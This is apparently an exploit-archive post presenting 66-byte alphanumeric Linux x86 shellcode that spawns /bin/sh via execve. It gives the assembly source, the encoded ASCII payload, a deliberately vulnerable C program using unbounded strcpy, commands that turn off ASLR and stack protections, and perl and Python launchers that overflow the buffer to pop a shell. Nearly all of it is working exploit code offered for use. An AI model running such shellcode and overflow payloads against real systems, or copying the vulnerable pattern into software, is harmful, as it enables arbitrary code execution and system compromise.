
# Title: Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
|
|
# Date: 2019-12-31
|
|
# Shellcode Author: bolonobolo
|
|
# Tested on: Linux x86
|
|
|
|
######################## execve.asm ###############################
|
|
global _start

section .text

_start:

; int 0x80 ------------
; Build the two-byte "int 0x80" opcode (0xcd 0x80) in EAX using only
; alphanumeric immediates, then leave it on the stack for later use.
; EDX is zeroed along the way.
push 0x30
pop eax
xor al, 0x30            ; EAX = 0
push eax
pop edx                 ; EDX = 0
dec eax                 ; EAX = 0xffffffff
xor ax, 0x4f73
xor ax, 0x3041          ; AX = 0x80cd -> bytes cd 80 ff ff once pushed
push eax
push edx
pop eax                 ; EAX = 0 again
;----------------------
; Build the NUL-terminated string "/bin//sh" on the stack, one dword at a time.
push edx                ; NUL terminator
push 0x68735858
pop eax
xor ax, 0x7777          ; EAX = 0x68732f2f ("//sh")
push eax
push 0x30
pop eax
xor al, 0x30            ; EAX = 0
xor eax, 0x6e696230
dec eax                 ; EAX = 0x6e69622f ("/bin")
push eax

; pushad/popad to place /bin/sh in EBX register
push esp
pop eax                 ; EAX = ESP = address of the string just built
; Push the eight registers in POPAD order with EAX in the slot that
; POPAD loads into EBX; ESP's slot is discarded by POPAD.
push edx
push ecx
push ebx
push eax
push esp
push ebp
push esi
push edi
popad                   ; EBX = path pointer, EAX = 0 (old EDX), EDX = old EBX
push eax
pop ecx                 ; ECX = 0 (NULL argv)
push ebx

xor al, 0x4a
xor al, 0x41            ; AL = 0x4a ^ 0x41 = 0x0b, the i386 execve syscall number
|
|
|
|
######################## ASCII string ##########################
|
|
|
|
j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A
|
|
|
|
########################## bof.c ####################
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
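/*
 * Deliberately vulnerable target program used by the PoC above.
 *
 * argv[1] is copied into a fixed 128-byte stack buffer with strcpy(), which
 * performs no bounds check; an argument longer than the buffer overwrites
 * the adjacent stack frame.  That overflow is the behaviour the PoC relies
 * on and is intentionally left in place.  The only change here is rejecting
 * a missing argument, which would otherwise dereference a NULL argv[1] and
 * crash before the copy.
 *
 * The build flags in the notes below (-z execstack, -fno-stack-protector)
 * are required by the PoC precisely because they switch off the mitigations
 * that would otherwise stop it.
 *
 * Returns 0 after the copy, 1 when no argument was supplied.
 */
int main(int argc, char *argv[]){
    char buffer[128];

    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }

    /* Intentionally unbounded copy: this is the overflow the PoC targets. */
    strcpy(buffer, argv[1]);
    return 0;
}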
|
|
|
|
|
|
When testing on newer kernels, remember to disable randomize_va_space and
to compile the C program with an executable stack and the stack protector
disabled
|
|
|
|
# bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
|
|
# sysctl -p
|
|
# gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g
|
|
bof.c -o bof
|
|
|
|
|
|
###################################################################
|
|
|
|
./bof `perl -e 'print "\x90"x48 .
|
|
"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" .
|
|
"D"x16 . "\xff\xe4" . "\x79\xf7\xff\xbf"'`
|
|
|
|
The \x79\xf7\xff\xbf may change; you must find an address yourself inside
the NOP sled before the shellcode
|
|
|
|
#################### alpha.py ############################
|
|
|
|
#!/usr/bin/python
|
|
import os
import subprocess
|
|
|
|
print "[*] Loading NOP"
|
|
z = "\x90"*48
|
|
print "[*] Loading alphanumeric"
|
|
z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"
|
|
print "[*] Loading syscall"
|
|
z += "D"*16
|
|
print "[*] Loading JMP and landing address"
|
|
z += "\xff\xe4\x79\xf7\xff\xbf"
|
|
print "[*] Popping the shell..."
|
|
os.system("./bof " + z)
|
|
|
|
|
|
################################################################## |